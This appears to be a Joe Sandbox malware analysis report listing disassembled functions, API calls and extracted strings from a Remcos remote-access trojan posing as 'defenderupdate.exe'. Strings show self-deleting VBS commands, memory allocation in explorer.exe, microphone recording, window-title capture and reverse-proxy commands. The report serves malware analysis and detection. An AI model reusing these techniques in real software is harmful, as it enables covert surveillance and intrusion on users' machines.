                                                                                                • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                                • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                                • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                • String ID:
                                                                                                • API String ID: 3899193279-0
                                                                                                • Opcode ID: 7acce36c14b6035b1c2eb814a55043d454006441e01e78848d5c2bc81b6dc77b
                                                                                                • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                • Opcode Fuzzy Hash: 7acce36c14b6035b1c2eb814a55043d454006441e01e78848d5c2bc81b6dc77b
                                                                                                • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                APIs
                                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                • String ID: Close
                                                                                                • API String ID: 1657328048-3535843008
                                                                                                • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                • _free.LIBCMT ref: 004500A6
                                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                • _free.LIBCMT ref: 004500C8
                                                                                                • _free.LIBCMT ref: 004500DD
                                                                                                • _free.LIBCMT ref: 004500E8
                                                                                                • _free.LIBCMT ref: 0045010A
                                                                                                • _free.LIBCMT ref: 0045011D
                                                                                                • _free.LIBCMT ref: 0045012B
                                                                                                • _free.LIBCMT ref: 00450136
                                                                                                • _free.LIBCMT ref: 0045016E
                                                                                                • _free.LIBCMT ref: 00450175
                                                                                                • _free.LIBCMT ref: 00450192
                                                                                                • _free.LIBCMT ref: 004501AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                • API String ID: 489098229-65789007
                                                                                                • Opcode ID: a8f8b58d2128b4f531cd6f97798560ad721fb8e33840202611e7dd41891fb402
                                                                                                • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                • Opcode Fuzzy Hash: a8f8b58d2128b4f531cd6f97798560ad721fb8e33840202611e7dd41891fb402
                                                                                                • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                APIs
                                                                                                • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                • API String ID: 994465650-2151626615
                                                                                                • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                                                • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                                                • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                                                                APIs
                                                                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                • API String ID: 1913171305-390638927
                                                                                                • Opcode ID: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                                                                • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                • Opcode Fuzzy Hash: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                                                                • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                APIs
                                                                                                  • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                • GetLastError.KERNEL32 ref: 00454A96
                                                                                                • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                • GetLastError.KERNEL32 ref: 00454C58
                                                                                                • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID: H
                                                                                                • API String ID: 4237864984-2852464175
                                                                                                • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                                                • API String ID: 911427763-3954389425
                                                                                                • Opcode ID: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                                                                • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                • Opcode Fuzzy Hash: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                                                                • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 65535$udp
                                                                                                • API String ID: 0-1267037602
                                                                                                • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                APIs
                                                                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LongNamePath
                                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                • API String ID: 82841172-425784914
                                                                                                • Opcode ID: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                                                                • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                • Opcode Fuzzy Hash: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                                                                • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                • _free.LIBCMT ref: 0043946A
                                                                                                • _free.LIBCMT ref: 00439471
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                • String ID:
                                                                                                • API String ID: 2441525078-0
                                                                                                • Opcode ID: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                                                                • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                • Opcode Fuzzy Hash: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                                                                • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\AppData\Roaming\defenderupdate.exe), ref: 00406705
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentProcess
                                                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                • API String ID: 2050909247-4145329354
                                                                                                • Opcode ID: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                                                                • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                • Opcode Fuzzy Hash: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                                                                • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Eventinet_ntoa
                                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                • API String ID: 3578746661-4192532303
                                                                                                • Opcode ID: a0049f2f09a357c7da3f2da1302c44ceee5b7892c88a4f25036bd0ddf1a9f3a7
                                                                                                • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                • Opcode Fuzzy Hash: a0049f2f09a357c7da3f2da1302c44ceee5b7892c88a4f25036bd0ddf1a9f3a7
                                                                                                • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                APIs
                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DecodePointer
                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                • API String ID: 3527080286-3064271455
                                                                                                • Opcode ID: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                                                                • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                • Opcode Fuzzy Hash: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                                                                • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                                                • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                • API String ID: 1462127192-2001430897
                                                                                                • Opcode ID: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                                                                • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                • Opcode Fuzzy Hash: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                                                                • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                APIs
                                                                                                • _strftime.LIBCMT ref: 00401AD3
                                                                                                  • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                • API String ID: 3809562944-3643129801
                                                                                                • Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                                                                • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                • Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                                                                • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                • waveInStart.WINMM ref: 00401A81
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                • String ID: XCG$`=G$x=G
                                                                                                • API String ID: 1356121797-903574159
                                                                                                • Opcode ID: 4fec801bf293db6df151fde61eeb5f786b1727cfb1468d64e42c9e242be372bd
                                                                                                • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                • Opcode Fuzzy Hash: 4fec801bf293db6df151fde61eeb5f786b1727cfb1468d64e42c9e242be372bd
                                                                                                • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                  • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                  • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                • String ID: Remcos
                                                                                                • API String ID: 1970332568-165870891
                                                                                                • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
